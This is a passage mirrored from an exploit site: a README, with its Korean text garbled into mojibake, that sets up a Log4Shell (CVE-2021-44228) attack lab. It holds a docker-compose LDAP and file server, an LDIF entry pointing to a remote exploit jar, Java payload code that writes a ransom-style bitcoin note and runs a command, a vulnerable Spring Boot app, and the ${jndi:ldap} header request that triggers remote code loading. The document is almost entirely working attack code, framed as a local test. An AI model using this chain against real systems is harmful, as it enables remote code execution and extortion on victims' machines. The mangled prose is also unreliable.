Share
## https://sploitus.com/exploit?id=8021D807-3EDC-55A7-A9ED-A364159FADEE
# cve-2021-44228-log4j-test
ν
μ€νΈ
## **1. LDAP μλ²μ ν΄νΉ νμΌ λ€μ΄λ‘λ μλ²**
### **1.1 Docker-compose μ€ν**
- docker-compose.yml
```
version: '2'
services:
dockerdj:
image: openidentityplatform/opendj:latest
container_name: ldap
environment:
ROOT_USER_DN: "cn=han"
ROOT_PASSWORD: "han"
BASE_DN: "dc=bumbing,dc=xyz"
ports:
- "389:1389"
- "636:1636"
- "4444:4444"
volumes:
- "./opendj/logs:/opt/opendj/data/logs"
nginx:
image: nginx:latest
container_name: nginx
ports:
- "7080:80"
volumes:
- "./file:/usr/share/nginx/html:ro"
- "./conf/nginx.conf:/etc/nginx/nginx.conf"
```
- docker-compose μ€ν
```jsx
docker-compose up -d
```
### **1.2. Ldif μΆκ°**
- add.ldif
```
version: 1
dn: dc=bumbing,dc=xyz
objectClass: domain
objectClass: top
dc: bumbing
dn: cn=log4j,dc=bumbing,dc=xyz
objectClass: javaContainer
objectClass: javaNamingReference
objectClass: javaObject
objectClass: top
cn: class
javaClassName: xyz.bumbing.log4j.Exploit
javaCodebase: http://{fileServer}:7080/exploit-1.jar
javaFactory: xyz.bumbing.log4j.Exploit
```
- ν΄νΉ νμΌ μ λ³΄κ° λ€μ΄κ° Entry μΆκ° 컀λ©λ
```
ldapadd -D "cn=han" -w han -H ldap://{ldapServer} -f add.ldif
```
- ldap ν
μ€νΈ(νλΌλ©ν° μμ μ€μ)
```
curl ldap://{ldapServer}/cn=log4j,dc=bumbing,dc=xyz
```
## **2. μ
μ± νμΌ**
- μλ° 8u191 μ΄μ λ²μ μμ μ·¨μ½μ λ°κ²¬, μλ° λ²μ 8λ²μ μΌλ‘ λΉλ
### **2.1 μ
μ± νμΌ λΉλ**
- μ
μ± μ½λ(λ€λ₯Έ μ
μ±νμΌμ λ€μ΄λ°λ 컀λ©λλ₯Ό μΆκ°ν μ μλ€.)
```java
public class Exploit implements javax.naming.spi.ObjectFactory{
@Override
public Object getObjectInstance(Object o, Name name, Context context, Hashtable<?, ?> hashtable) throws Exception {
try {
new File("/Users//test").createNewFile();
String msg = "your computer has our virus. if you want to recover your computer, send bitcoin our wallet";
FileOutputStream fileOutputSteam = new FileOutputStream(new File("/Users/hanbeomhee/test"));
StringBuilder sb = new StringBuilder();
sb.append(o.toString()).append("\n");
sb.append(name).append("\n");
sb.append(msg);
fileOutputSteam.write(sb.toString().getBytes(StandardCharsets.UTF_8));
fileOutputSteam.close();
} catch (IOException e) {
e.printStackTrace();
}
Runtime.getRuntime().exec("open /Users//test");
return null;
}
}
```
- λΉλ 컀λ©λ
```bash
./gradlew clean build
```
- λ‘컬 μλ² μλμ exploit-1.jarνμΌ νμΌ μλ²μ docker/file ν΄λμ μ
λ‘λ
- http://{fileServer}:7080/exploit-1.jar λ€μ΄λ‘λ νμΈ
## **3. μ·¨μ½μ μλ² μ΄κΈ°**
- κ·Έλλ€ κ΅¬μ‘°
```java
plugins {
id 'org.springframework.boot' version '2.6.1'
id 'io.spring.dependency-management' version '1.0.11.RELEASE'
id 'java'
}
group = 'xyz.bumbing'
version = '0.0.1-SNAPSHOT'
sourceCompatibility = '8'
configurations {
compileOnly {
extendsFrom annotationProcessor
}
}
repositories {
mavenCentral()
}
dependencies {
implementation 'org.springframework.boot:spring-boot-starter-web'
compileOnly 'org.projectlombok:lombok'
annotationProcessor 'org.projectlombok:lombok'
testImplementation 'org.springframework.boot:spring-boot-starter-test'
implementation "org.springframework.boot:spring-boot-starter-log4j2"
modules {
module("org.springframework.boot:spring-boot-starter-logging") {
replacedBy("org.springframework.boot:spring-boot-starter-log4j2", "Use Log4j2 instead of Logback")
}
}
}
test {
useJUnitPlatform()
}
```
- dependencyμμ log4j λ²μ 14.1 νμΈ
- μλ²μ½λ
```java
@SpringBootApplication
@RestController
@Slf4j
public class Log4jtestApplication {
public static void main(String[] args) {
SpringApplication.run(Log4jtestApplication.class, args);
}
@GetMapping("/log4j")
public void test(String param, HttpServletRequest request){
log.info(request.getHeader("User-Agent"));
}
}
```
- μ€ν 컀λ©λ(8u191 μ΄μ κ±Έλ‘ λΉλ λ° μ€ν ν΄μΌν¨)
```java
java -jar build/libs/log4jtest-0.0.1-SNAPSHOT.jar
```
## **4. μ€ν**
### 4.1 μ€ν
```
curl --location --request GET 'localhost:8080/log4j' \
--header 'User-Agent: ${jndi:ldap://localhost/cn=log4j,dc=bumbing,dc=xyz}'
```